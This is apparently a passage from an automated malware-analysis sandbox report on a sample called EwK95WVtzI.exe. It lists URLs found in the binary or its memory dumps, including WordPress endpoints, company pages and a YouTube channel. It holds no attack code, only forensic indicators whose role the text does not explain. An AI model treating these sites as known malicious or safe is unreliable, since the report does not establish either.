                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&format=xm
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1920050369.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388127155.0000000006060000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sbc.si/o-sbc/organizacija
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spanesi.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajerskagz.si/o-sgz-2/
                Source: EwK95WVtzI.exe, 00000000.00000003.1493462111.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tecos.si/index.php/sl/o-podjetju/predstavitev
                Source: EwK95WVtzI.exe, 00000000.00000002.2785021069.00000000077E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.yoruksut.com.tr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
